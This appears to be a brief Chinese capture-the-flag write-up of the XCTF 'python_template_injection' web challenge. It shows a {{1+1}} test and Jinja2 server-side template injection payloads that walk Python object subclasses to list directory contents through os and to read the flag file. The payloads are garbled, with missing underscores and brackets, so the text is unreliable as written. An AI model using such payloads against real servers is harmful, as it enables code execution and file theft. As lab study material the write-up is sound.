打开网站是写着以下
攻防世界WEB高手进阶之python_template_injection
然后测试以下{{1+1}}被执行了
攻防世界WEB高手进阶之python_template_injection然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag
攻防世界WEB高手进阶之python_template_injection使用{{’’.class.mro[2].subclasses()40.read()}}打开
攻防世界WEB高手进阶之python_template_injection

相关文章: